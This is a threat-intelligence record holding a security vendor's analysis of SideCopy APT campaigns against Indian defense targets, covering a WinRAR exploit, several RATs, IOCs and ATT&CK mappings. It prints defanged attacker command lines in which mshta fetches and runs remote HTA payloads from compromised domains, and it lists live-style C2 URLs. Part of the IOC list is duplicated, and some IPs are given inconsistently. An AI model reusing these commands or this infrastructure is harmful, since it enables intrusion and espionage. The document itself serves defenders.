{ "id": "53ceafff-a3c8-4526-bb52-9a65b573baae", "created_at": "2026-04-06T00:09:32.315897Z", "updated_at": "2026-04-10T13:11:57.713773Z", "deleted_at": null, "sha1_hash": "1391f10eb893f4c3853f113bf29fe8ea7aba8e77", "title": "SideCopy’s Multi-platform Onslaught: Leveraging WinRAR Zero-Day and Linux Variant of Ares RAT", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2444497, "plain_text": "SideCopy’s Multi-platform Onslaught: Leveraging WinRAR Zero-Day and Linux Variant of Ares RAT\r\nBy Sathwik Ram Prakki\r\nPublished: 2023-11-06 · Archived: 2026-04-05 17:05:01 UTC\r\nSEQRITE Labs APT-Team has discovered multiple campaigns of APT SideCopy, targeting Indian government\r\nand defense entities in the past few months. The threat group is now exploiting the recent WinRAR vulnerability\r\nCVE-2023-38831 (See our advisory for more details) to deploy AllaKore RAT, DRat and additional payloads. The\r\ncompromised domains, used to host payloads by SideCopy, are reused multiple times, resolving to the same IP\r\naddress. It has also deployed a Linux variant of open-source agent called Ares RAT, where code similarity with its\r\nparent threat group Transparent Tribe (APT36) has been found in the stager payload. Conducting multi-platform\r\nattacks simultaneously with the same decoys and naming convention, both SideCopy and APT36 share\r\ninfrastructure and code to aggressively target India.\r\nIn this blog, we’ll delve into the technicalities of two such campaigns we encountered during our telemetry\r\nanalysis. We have observed more similar ongoing campaigns unfold and expect them to continue as the Israel-Hamas conflict intensifies, where not only Pakistan-aligned hacktivists but also other groups against Israel are\r\ntargeting Indian websites with DDoS, defacement, and data breach attacks.\r\nThreat Actor Profile\r\nSideCopy is a Pakistan-linked Advanced Persistent Threat group that has been targeting South Asian countries,\r\nprimarily the Indian Defense and Afghanistan government entities, since at least 2019. Almost every month, a new\r\nattack campaign has been observed this year in our telemetry, with changes over time where additional stages with\r\nDouble Action RAT, new .NET-based RAT, and TTPs where PowerShell remote execution has been uncovered by\r\nour team. Its arsenal includes Action RAT, AllaKore RAT, Reverse RAT, Margulas RAT and more.\r\nThis group is associated as a sub-division of Transparent Tribe (APT36), which has been persistently targeting the\r\nIndian Military and is continuing to target university students aggressively this year to share student data, possibly\r\nwith terrorist groups for recruitment. It has updated its Linux malware arsenal this year with Poseidon and other\r\nutilities. Active since 2013, it has continuously used payloads such as Crimson RAT, Capra RAT, and Oblique\r\nRAT in its campaigns.\r\nPakistani agents have used honey traps to lure defense personnel, creating an immense impact and damage by\r\nstealing confidential intel in this form of cyber espionage.\r\nAnalysis of Campaign-1\r\nThe first campaign of SideCopy observed is spread via a phishing link that downloads an archive file named\r\n“Homosexuality – Indian Armed Forces.” The decoy document is related to NSRO and is called “ACR.pdf” or\r\n“ACR_ICR_ECR_Form_for_Endorsement_New_Policy.pdf.”\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 1 of 21\n\nFig. 1 – Decoy PDF\r\nInterestingly, we found the same decoy PDF is utilized by the Linux variant of Ares RAT, which was first seen in\r\nthe last week of August on Virus Total. Both the compromised domains used resolved to the same IP address, as\r\nshown in the below figure. The domains used in April ‘ssynergy[.]in’ and May ‘elfinindia[.]com’ campaigns also\r\npoint to the same IP. Moreover, the archive files hosted on different domains have the same name, indicating the\r\nreuse of compromised domains.\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 2 of 21\n\nFig. 2 – Infection chain-1 with the same IP\r\nThe phishing URL targeting the Windows platform points to sunfireglobal[.]in, a compromised domain that is not\r\nalive at the time of writing, is resolving to the IP: 162.241.85[.]104. URL is:\r\nhxxps://sunfireglobal[.]in/public/core/homo/Homosexuality%20-%20Indian%20Armed%20Forces.zip\r\nThis contains a malicious shortcut file in a double extension format named “Homosexuality – Indian Armed\r\nForces ․pdf.lnk” that triggers a remote HTA file as:\r\nC:\\Windows\\System32\\mshta.exe “hxxps://sunfireglobal[.]in/public/assests/files/db/acr/” \u0026\u0026 tar.exe\r\nIt contains two embedded files that are base64 encoded; one is the decoy PDF, and the other is a DLL. Only minor\r\nchanges were observed in the HTA, and functionality remains the same – to check the .NET version, fetch the AV\r\ninstalled, decode, and run the DLL in-memory.\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 3 of 21\n\nAfter the decoy file is opened by the DLL (preBotHta), it beacons to the same domain and downloads an HTA and\r\nthe final DLL contents to their target paths. The downloaded HTA is saved as “seqrite.jpg” in the TEMP folder,\r\nlater moved to the target folder, and executed. Depending on the AV present – SEQRITE, Quick Heal, Kaspersky,\r\nAvast, Avira, Bitdefender, and Windows Defender; it executes the final DLL payload.\r\nFig. 3 – DLL preBotHta run in-memory\r\nLegitimate Windows apps like Credential wizard (credwiz.exe) or EFS REKEY wizard (rekeywiz.exe) are copied\r\nbeside the target to sideload the DLL. Persistence is maintained via Startup (or) Run registry key to load the final\r\nRAT payload on system reboot. (Detailed analysis of Action RAT and all other payloads can be found in our\r\nprevious whitepaper)\r\nAnother archive file with the same name, “Homosexuality – Indian Armed Forces.zip,” is seen that contains an\r\nELF file. It is spread using a domain named “occoman[.]com,” resolving to the same IP address for the\r\nsunfireglobal[.].in, showing the sharing of IP between compromised domains.\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 4 of 21\n\nFig. 4 – Content of both the archives\r\nDifferent file names for this Golang-based Linux malware that is masqueraded as a PDF were found as:\r\nHomosexuality – Indian Armed Forces ․pdf 2023-10-24\r\nUnit Training Program ․pdf 2023-09-20\r\nSocial Media Usage ․pptx 2023-08-30\r\nUtilizing the GoReSym plugin with IDA, we can extract function metadata as the binary is stripped (See our in-depth analysis of Go-based Warp malware for plugin details).\r\nThe process flow is similar to the first stage seen in the case of the Poseidon agent (observed by Uptycs and\r\nZscaler) having the exact target location, though this stage is not compiled using PyInstaller:\r\n1. Create a crontab to maintain persistence through system reboot under the current username.\r\n2. Download the decoy to the target directory “/.local/share” and open it.\r\n3. Download the Ares agent as “/.local/share/updates” and execute it.\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 5 of 21\n\nFig. 5 – Process flow of Stage-1\r\nAfter extracting the contents of the final PyInstaller payload, two Python-compiled files of our interest (agent.pyc\r\nand config.pyc) are retrieved. Decompiling and examining them leads to an open-source Python RAT called Ares.\r\n The URL format used to ping the server is: “hxxps://(host)/api/(uid)/hello.” and it includes the platform,\r\nhostname and username of the victim machine along with it. It supports the following 13 commands for C2\r\ncommunication.\r\nCommand Description\r\nupload Uploads a local file to the server\r\ndownload Downloads a file via HTTP(s)\r\nzip Creates a zip archive of a file or folder\r\ncd Change the current directory\r\nscreenshot Takes a screenshot and uploads it to the server\r\npython Runs a Python command or a Python file\r\npersist Installs the agent via AutoStart directory\r\nclean Uninstalls the agent\r\nexit Kills the agent\r\ncrack Removes persistence and kills the agent\r\nlistall List file directory and upload it to the server\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 6 of 21\n\nhelp Display the help\r\n\u003ccommand\u003e Executes a shell command and returns its output\r\nNo major changes were observed in the agent apart from changing the name from ares to gedit, and the server\r\nused by the agent is present in the config file: 161.97.151[.]200:7015. Both the agent and config scripts include\r\nthe name ‘lee’ pointing to the same agent as referred by Lumen.\r\nFig. 6 – Config file\r\nFig. 7 – Agent script\r\nThis payload is also named “bossupdate,” a similar naming convention seen with Poseidon and other utilities of\r\nTransparent Tribe that starts with the ‘boss’ prefix. APT36 is aiming for the operating system BOSS, developed in\r\nIndia for government entities, and is constantly expanding its Linux arsenal. Back in 2021, SideCopy was linked\r\nto the same RAT by QiAnXin’s Red Raindrop Team and a forked version called BackNet by Telsy later.\r\nAnalysis of Campaign-2\r\nThe second campaign has the same scenario where IP sharing is seen not only with the compromised domains but\r\nalso with the C2 infrastructure. Exploitation of the recent WinRAR vulnerability CVE-2023-38831 is done via\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 7 of 21\n\nphishing, which downloads malicious archive files. Upon opening the archive files, a pdf file and a folder with the\r\nsame name are present.\r\nFig. 8 – Archives used for WinRAR exploitation\r\nOpening the PDF will trigger the vulnerability, quietly launching the payload inside the folder by ShellExecute\r\nfunction of the WinRAR application.  The decoy PDF is related to an organization called the ‘All India\r\nAssociation of Non-Gazetted Officers’ (AIANGOs), which mentions a peaceful protest program to the Indian\r\nMinistry of Defense. Headquartered in Mumbai, AIANGOs was recognized by GOI, MoD in 2000 under\r\nCCS(RSA) Rule 1993 and affiliated to CDRA, as mentioned on their X (Twitter) page.\r\nFig. 9 – Decoy used in WinRAR exploitation\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 8 of 21\n\nThe payload present in the folder is the AllaKore RAT agent, which has the functionality to steal system\r\ninformation, keylogging, take screenshots, upload \u0026 download files, and take the remote access of the victim\r\nmachine to send commands and upload stolen data to the C2.  Additionally, more connections have been made\r\nwith the C2 utilized and its previous campaign, as described below:\r\nFig. 10 – Infection chain-2 with IP sharing with domains and C2\r\nCorrelation\r\nA similar attack chain of SideCopy is observed with the lure document “DocScanner-Oct” referring to the\r\nMinistry of Defences’ Saudi Delegation. The same decoy was observed to be used by SideCopy \u0026 APT36\r\nearlier in an April \u0026 May campaign, respectively.\r\nThe compromised domain in this chain, ‘rockwellroyalhomes[.]com’ is resolving to the same IP\r\n103.76.213[.]95 used with the domain ‘isometricsindia[.]co.in,’ which was observed to be used by them in\r\nan August campaign utilizing the theme: “US vs. China trade war.”\r\nThe final payload DRat connects with the IP 38.242.149[.]89 for C2 communication used with AllaKore\r\nRAT.\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 9 of 21\n\nA similar phishing URL is found on the same “rockwellroyalhomes” domain, named similarly\r\n“DocScanner_AUG_2023.zip.” This leads to another Ares RAT sample, connecting to C2 having IP\r\n38.242.220[.]166:9012, where the decoy points to India’s Ministry of Defense again regarding the\r\n“Parliament Matter.”\r\nFig. 8 – Decoy used with Ares RAT\r\nThe phishing URL is pointing to rockwellroyalhomes[.]com, a compromised domain that is resolving to the IP:\r\n103.76.231[.]95\r\nhxxps://www.rockwellroyalhomes.com/js/FL/DocScanner-Oct.zip\r\nThis contains a malicious shortcut file in a double extension format named “DocScanner-Oct.zip․pdf.lnk,” that\r\ntriggers a remote HTA file as:\r\nC:\\Windows\\System32\\mshta.exe hxxps://www.rockwellroyalhomes.com/js/content/ \u0026 mshta.exe\r\nIt contains embedded files that are base64 encoded; they are decoy PDF, DLL, and EXE. Similar checks for anti-virus present on the victim machine is done, opens the decoy and drops the final DRat payload, a new Remote\r\nAccess Trojan named from the PDB path:\r\nd:\\Projects\\C#\\D-Rat\\DRat Client\\Tenure\\obj\\Release\\MSEclipse.pdb\r\nThe 13 commands supported have the following functionality:\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 10 of 21\n\nDecoded Command Functionality\r\ngetInformitica Send system info – User \u0026 OS name, timestamp, Start-up path\r\nsup Send a ‘supconfirm’ message to start receiving commands\r\nclose Send a ‘closure’ message to close the connection and exit\r\nKaamindina Check running status\r\ndel Delete specific directory (or) file and send confirmation\r\nenterPath Enter a specific directory and send attributes for each file \u0026 sub-folder\r\nbackPath Send the current working directory\r\ndriveList\r\nFetch disk info and DeviceID using:\r\n‘SELECT * FROM Win32_LogicalDisk WHERE DriveType = 3’\r\nfdl Upload file attributes\r\nfdIConfirm Upload file\r\nfup Download file\r\nfupexec Download and execute (1)\r\nsupexec Download and execute (2)\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 11 of 21\n\nFig. 8 – Reuse of decoy with DRat\r\nAnother campaign has been found with similar targeting of Windows and Linux platforms simultaneously. A new\r\npayload for Windows, named Key RAT, is deployed in this case along Ares RAT. IOCs for this third campaign\r\nhave been included at the end.\r\nC2 Infrastructure and Domains\r\nAll the C2 servers are registered in Germany to Contabo GmbH, commonly used by both the Pakistan-linked\r\nAPTs.\r\n38.242.149[.]89 vmi1433024.contaboserver.net AllaKore RAT and DRat\r\n207.180.192[.]77 vmi747785.contaboserver.net Key RAT\r\n38.242.220[.]166 vmi1390334.contaboserver.net Ares RAT\r\n161.97.151[.]220 vmi1370228.contaboserver.net Ares RAT\r\nOne server of Ares that is linked with multiple baits, is running pfsense firewall on port 9012 for C2\r\ncommunication – 38.242.220[.]166.\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 12 of 21\n\nFig. 9 – Ares server details\r\nFig. 10 – pfsense login page of Ares server\r\nAll the compromised domains used by SideCopy this year, have GoDaddy as registrar with HostGator server\r\nname. Whois details are:\r\nIP Domain Campaign Registrant\r\n103.76.213[.]95\r\nOrg: Spectra Technologies\r\nISP: CtrlS\r\nDelhi, India – AS18229\r\nisometricsindia[.]co.in August Ozanera Pvt. Ltd., Mumbai\r\nrockwellroyalhomes[.]com October Tempe, Arizona, US\r\n162.241.85[.]104\r\nOrg \u0026 ISP: Unified Layer\r\nProvo, Utah, US – AS46606\r\nsunfireglobal[.]in October West Bengal, India\r\noccoman[.]com August Tempe, Arizona, US\r\nelfinindia[.]com May Tempe, Arizona, US\r\nssynergy[.]in April West Bengal, India\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 13 of 21\n\nWe have seen the machine name ‘desktop-g4b6mh4’ associated with a huge number of shortcut files this year. It is\r\nnot only observed in these campaigns, but new ones have been used by the threat actor:\r\ndesktop-87p7en5\r\ndesktop-ey8nc5b\r\nConclusion \u0026 Attribution\r\nExpanding its arsenal with zero-day vulnerability, SideCopy consistently targets Indian defense organizations with\r\nvarious remote access trojans. Based on the attack chain, selection of target, baits used and infrastructure; these\r\ncampaigns are attributed to SideCopy with high confidence. APT36 is expanding its Linux arsenal constantly,\r\nwhere sharing its Linux stagers with SideCopy is observed to deploy an open-source Python RAT called Ares. At\r\nthe same time, we have observed telemetry hits for this campaign in multiple Indian cities, showing an uptick in\r\nactivity amidst the Israel-Hamas conflict. Overall, both these and additional campaigns have connections to the\r\nsharing of code and infrastructure between these closely related threat groups.\r\nSEQRITE Protection\r\nLNK.Trojan.48283.GC SideCopy.Trojan.48284.GC JS.Trojan.47685\r\nLNK.Dropper.47686.GC SideCopy.Trojan.48285.GC JS.Sidecopy.47539.GC\r\nLNK.Sidecopy.47538.GC Trojan.SideCopy.S30112863 JS.Sidecopy.47540\r\nELF.Agent.48298.GC Trojan.SideCopy.S30112905 JS.SideCopy.42911\r\nELF.Agent.48286.GC Trojan.Sidecopy.S30112904 Trojan.SideCopy\r\nScript.Trojan.47763 TrojanAPT.SideCopy.PB1\r\nPrecautions to be taken\r\nIt is necessary to stay protected from such critical cyber-attacks by taking the following precautions:\r\nAvoid clicking on any unverified links from unknown sources.\r\nDo not download and open any attachments, especially archive files.\r\nUse endpoint protection to stay ahead in the ongoing threat landscape.\r\nRegularly update your OS and software apps to fix known vulnerabilities.\r\nAdd password-protection to confidential documents and sensitive information.\r\nIOCs\r\nWindows\r\nArchives\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 14 of 21\n\neb07a0063132e33c66d0984266afb8ae DocScanner-Oct.zip\r\n8bee417262cf81bc45646da357541036 Homosexuality – Indian Armed Forces.zip\r\n9e9f93304c8d77c9473de475545bbc23 Achievements_of_DMA.rar\r\n9379ebf1a732bfb1f4f8915dbb82ca56 Agenda_Points_Ammended.rar\r\n49b29596c81892f8fff321ff8d64105a DMA_Monthly_Update_Minutes_of_Meeting-reg.zip\r\nShortcut (LNK)\r\n75f9d86638c8634620f02370c28b8ebd DocScanner-Oct.pdf.lnk\r\nfc5eae3562c9dbf215384ddaf0ce3b03 Homosexuality – Indian Armed Forces. pdf.lnk\r\na52d2a0edccdc0f533c7b04e88fe8092\r\nagenda_points.docx.lnk\r\ndraft_short_PPT.pptx.lnk\r\nmeeting_brief.pdf.lnk\r\nHTA\r\n02c444c5c1ad25e6823457705e8820bc msfnt.hta\r\nd6e214fd81e7afb57ea77b79f8ff1d45 p.hta\r\nd0c80705be2bc778c7030aae1087f96e main.hta\r\nDLL\r\n31340EA400E6611486D5E57F0FAB5AF2 SummitOfBion.dll\r\nFE0250AF25C625E24608D8594B716ECB preBotHta.dll\r\nC872F21B06C4613954FFC0676C1092E3 WinGfx.dll\r\nRAT\r\nff13b07eaabf984900e88657f5d193e6 Msfront.exe (DRat)\r\n6f37dacf81af574f1c8a310c592df63f Achievements_of_DMA.pdf .exe (AllaKore RAT)\r\n9f5354dcf6e6b5acd4213d9ff77ce07c steistem.exe / Onlyme.exe (Key RAT)\r\nDecoys\r\nCCB6723C14EBB0A12395668377CF3F7A DocScanner-Oct.pdf\r\nacec2107d4839fbb04defbe376ac4973 Achievements_of_DMA.pdf_\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 15 of 21\n\nf759b6581367db35e3978125f4f6ff80 ACR.pdf\r\nOthers\r\nB6FBCAE7980D4E02CE9ED9876717F385 cache.bat\r\n4f541ec8cd238737e4e77a55fbcbb4f3 d.txt\r\nPDB\r\nd:\\Projects\\C#\\D-Rat\\DRat Client\\Tenure\\obj\\Release\\MSEclipse.pdb\r\nC:\\Users\\Boss\\Desktop\\test\\Client\\Client\\obj\\Release\\Onlyme.pdb\r\nLinux\r\nArchive\r\n7cba23cfd9587211e7a214a88589cf25 DocScanner_AUG_2023.zip\r\n04a65069054085cd81daabe4fc15ce76 Homosexuality – Indian Armed Forces.zip\r\nc61b19cbedcb878aff45c067d503d556 meeting-details.zip\r\neccc72deb8ce41433ed13591b4557343 DMA_Monthly_Update_Minutes_of_Meeting-reg.zip\r\nStager\r\n9375e3c13c85990822d2f09a66b551d9 DocScanner_AUG_2023.pdf\r\n42a696ef6f7acf0919fea9748029a966 Homosexuality – Indian Armed Forces ․pdf\r\n54473E0D8CAFD950AFE32DE1A2F3A508 DocScanner_Updated_letter․pdf\r\n36933B05B7E3060955E6A1FDFD7D8EC1 draft_letter_nov_2023․docx\r\n508F4BFAD9F2482992AC7926910BD551 updated_draft_PPT․pptx\r\n921915ecfe17593476648ad20cd61ecd Meeting_Notice-reg․pdf\r\nDecoys\r\n5e32703e3704b2b5c299c242713b1ec5 DocScanner_AUG_2023.pdf\r\nf759b6581367db35e3978125f4f6ff80 ACR.pdf\r\naf3ec4f8a072779eb0cac18eaafc256d Meeting_Notice-reg.pdf\r\n0799e17933b875e3a54f01416e7505d5 DocScanner_Updated_letter.pdf\r\nb4854c420bc39c8c77a0fcd9395a8748 draft_letter_nov_2023.docx\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 16 of 21\n\n4cd0ee8186dc4203aad0cba48a8e5778 updated_draft_PPT.pptx\r\nAres RAT\r\n088b89698b122454666e542b1e1d92a4 bossupdate\r\nb992b03b0942658a516439b56afbf41a updates\r\nebbc1c4fc617cda7a0b341b12f45d2ad updates\r\nC2 and Domains\r\n38.242.149[.]89:61101 AllaKore RAT\r\n38.242.149[.]89:9828 DRat\r\n38.242.220[.]166:9012\r\n161.97.151[.]220:7015\r\nAres RAT\r\n207.180.192[.]77:6023 Key RAT\r\n162.241.85[.]104\r\nsunfireglobal[.]in\r\noccoman[.]com\r\nelfinindia[.]com\r\nssynergy[.]in\r\n103.76.213[.]95\r\nrockwellroyalhomes[.]com\r\nisometricsindia[.]co.in\r\nURLs\r\nhxxps://www.rockwellroyalhomes[.]com/js/FL/DocScanner-Oct.zip\r\nhxxps://www.rockwellroyalhomes[.]com/js/content/msfnt.hta\r\nhxxps://www.rockwellroyalhomes[.]com/js/content/2023-06-21-0056.pdf\r\nhxxps://www.rockwellroyalhomes[.]com/js/content/\r\nhxxps://www.rockwellroyalhomes[.]com/js/FL/2023-06-21-0056.pdf\r\nhxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/file/\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 17 of 21\n\nhxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/doc/\r\nhxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/doc/DocScanner_AUG_2023.zip\r\nhxxps://sunfireglobal[.]in/public/core/homo/\r\nhxxps://sunfireglobal[.]in/public/assests/files/db/acr/\r\nhxxps://sunfireglobal[.]in/public/assests/files/auth/av\r\nhxxps://sunfireglobal[.]in/public/assests/files/auth/dl\r\nhxxps://sunfireglobal[.]in/public/assests/files/auth/ht\r\nhxxps://occoman[.]com/wp-admin/css/colors/ocean/files/files/tls\r\nhxxps://occoman[.]com/wp-admin/css/colors/ocean/files/files/\r\nhxxps://occoman[.]com/wp-admin/css/colors/ocean/files/pdf/in\r\nhxxps://occoman[.]com/wp-admin/css/colors/ocean/files/files/bossupdate\r\nhxxps://futureuniform[.]ca/wp/wp-content/files/01/main.hta\r\nhxxps://futureuniform[.]ca/email.gov.in/briefcase/Meeting_Notice-reg.pdf\r\nhxxps://futureuniform[.]ca/mail.gov.in/briefcase/updated_draft_PPT.pptx\r\nhxxps://futureuniform[.]ca/mail.gov.in/briefcase/draft_letter_nov_2023.docx\r\nhxxps://futureuniform[.]ca/mail.gov.in/briefcase/DocScanner_Updated_letter.pdf\r\nhxxps://keziaschool[.]com/wp/wp-content/uploads/2023/files/bossupdate\r\nhxxps://keziaschool[.]com/wp/wp-content/uploads/2023/38\r\nhxxp://38.242.220[.]166:9012/api/root_149371139681480/upload\r\nhxxp://38.242.220[.]166:9012/api/root_149371139681480/hello\r\nhxxp://38.242.220[.]166:9012/api/root_168683512566649/upload\r\nhxxp://38.242.220[.]166:9012/api/root_168683512566649/hello\r\nhxxp://38.242.220[.]166:9012/api/root_175170531258512/upload\r\nhxxp://38.242.220[.]166:9012/api/root_175170531258512/hello\r\nhxxp://161.97.151[.]220:7015/api/root_36854582802642/upload\r\nhxxp://161.97.151[.]220:7015/api/root_36854582802642/hello\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 18 of 21\n\nHost\r\nC:\\Users\\Public\\aque\\up.hta\r\nC:\\Users\\Public\\aque\\cdrzip.exe\r\nC:\\Users\\Public\\aque\\rekeywiz.exe\r\nC:\\Users\\Public\\aque\\DUser.dll\r\nC:\\Users\\Public\\aque\\data.bat\r\nC:\\Users\\Public\\Msfront\\Msfront.exe\r\nC:\\Users\\Public\\winowimg.jpg\r\nC:\\Users\\Public\\stremoe\\steistem.exe\r\nC:\\Users\\Public\\stremoe\\stremoe.bat\r\nC:\\ProgramData\\Intel\\cdrzip.exe\r\nC:\\ProgramData\\Intel\\DUser.dll\r\nC:\\ProgramData\\WinGfx\\credwiz.exe\r\nC:\\ProgramData\\WinGfx\\wingfx.bat\r\nC:\\ProgramData\\WinGfx\\DUser.dll\r\nC:\\ProgramData\\HP\\jquery.hta\r\nC:\\ProgramData\\HP\\jscy.hta\r\n%AppData%\\Msfront\\Msfront.exe\r\n%AppData%\\Msfront\\DUser.dll\r\n%AppData%\\Msfront\\crezly.exe\r\n%Temp%\\cache.bat\r\n%Temp%\\Msfont\\Msfont.exe\r\nMITRE ATT\u0026CK\r\nTactic Technique ID Name\r\nResource Development T1583.001\r\nT1584.001\r\nAcquire Infrastructure: Domains\r\nCompromise Infrastructure: Domains\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 19 of 21\n\nT1588.001\r\nT1588.002\r\nT1608.001\r\nT1608.005\r\nObtain Capabilities: Malware\r\nObtain Capabilities: Tool\r\nStage Capabilities: Upload Malware\r\nStage Capabilities: Link Target\r\nInitial Access\r\nT1566.001\r\nT1566.002\r\nPhishing: Spear phishing Attachment\r\nPhishing: Spear phishing Link\r\nExecution\r\nT1106\r\nT1129\r\nT1059\r\nT1047\r\nT1203\r\nT1204.001\r\nT1204.002\r\nNative API\r\nShared Modules\r\nCommand and Scripting Interpreter\r\nWindows Management Instrumentation\r\nExploitation for Client Execution\r\nUser Execution: Malicious Link\r\nUser Execution: Malicious File\r\nPersistence\r\nT1053.003\r\nT1547.001\r\nT1547.013\r\nScheduled Task/Job: Cron\r\nRegistry Run Keys / Startup Folder\r\nBoot or Logon Autostart Execution: XDG Autostart Entries\r\nDefense Evasion\r\nT1036.005\r\nT1140\r\nT1218.005\r\nT1574.002\r\nT1222.002\r\nT1027.009\r\nT1027.010\r\nMasquerading: Match Legitimate Name or Location\r\nDeobfuscate/Decode Files or Information\r\nSystem Binary Proxy Execution: Mshta\r\nHijack Execution Flow: DLL Side-Loading\r\nFile and Directory Permissions Modification: Linux\r\nObfuscated Files or Information: Embedded Payloads\r\nObfuscated Files or Information: Command Obfuscation\r\nDiscovery T1012 Query Registry\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 20 of 21\n\nT1033\r\nT1057\r\nT1082\r\nT1083\r\nT1016.001\r\nT1518.001\r\nSystem Owner/User Discovery\r\nProcess Discovery\r\nSystem Information Discovery\r\nFile and Directory Discovery\r\nSystem Network Configuration Discovery\r\nSoftware Discovery: Security Software Discovery\r\nCollection\r\nT1005\r\nT1056.001\r\nT1074.001\r\nT1119\r\nT1113\r\nT1125\r\nData from Local System\r\nInput Capture: Keylogging\r\nData Staged: Local Data Staging\r\nAutomated Collection\r\nScreen Capture\r\nVideo Capture\r\nCommand and Control\r\nT1105\r\nT1571\r\nT1573\r\nT1071.001\r\nIngress Tool Transfer\r\nNon-Standard Port\r\nEncrypted Channel\r\nApplication Layer Protocol: Web Protocols\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nSource: https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/\r\nPage 21 of 21\n\nhttps://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/ \n4cd0ee8186dc4203aad0cba48a8e5778 updated_draft_PPT.pptx\nAres RAT \n088b89698b122454666e542b1e1d92a4 bossupdate\nb992b03b0942658a516439b56afbf41a updates\nebbc1c4fc617cda7a0b341b12f45d2ad updates\nC2 and Domains \n38.242.149[.]89:61101 AllaKore RAT\n38.242.149[.]89:9828 DRat\n38.242.220[.]166:9012 \n Ares RAT\n161.97.151[.]220:7015 \n207.180.192[.]77:6023 Key RAT\n sunfireglobal[.]in\n occoman[.]com\n162.241.85[.]104 \n elfinindia[.]com\n ssynergy[.]in\n rockwellroyalhomes[.]com\n103.76.213[.]95 \n isometricsindia[.]co.in\nURLs \nhxxps://www.rockwellroyalhomes[.]com/js/FL/DocScanner-Oct.zip \nhxxps://www.rockwellroyalhomes[.]com/js/content/msfnt.hta \nhxxps://www.rockwellroyalhomes[.]com/js/content/2023-06-21-0056.pdf \nhxxps://www.rockwellroyalhomes[.]com/js/content/ \nhxxps://www.rockwellroyalhomes[.]com/js/FL/2023-06-21-0056.pdf \nhxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/file/ \n Page 17 of 21", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.seqrite.com/blog/sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat/" ], "report_names": [ "sidecopys-multi-platform-onslaught-leveraging-winrar-zero-day-and-linux-variant-of-ares-rat" ], "threat_actors": [ { "id": "414d7c65-5872-4e56-8a7d-49a2aeef1632", "created_at": "2025-08-07T02:03:24.7983Z", "updated_at": "2026-04-10T02:00:03.76109Z", "deleted_at": null, "main_name": "COPPER FIELDSTONE", "aliases": [ "APT36 ", "Earth Karkaddan ", "Gorgon Group ", "Green Havildar ", "Mythic Leopard ", "Operation C-Major ", "Operation Transparent Tribe ", "Pasty Draco ", "ProjectM ", "Storm-0156 " ], "source_name": "Secureworks:COPPER FIELDSTONE", "tools": [ "CapraRAT", "Crimson RAT", "DarkComet", "ElizaRAT", "LuminosityLink", "ObliqueRAT", "Peppy", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], 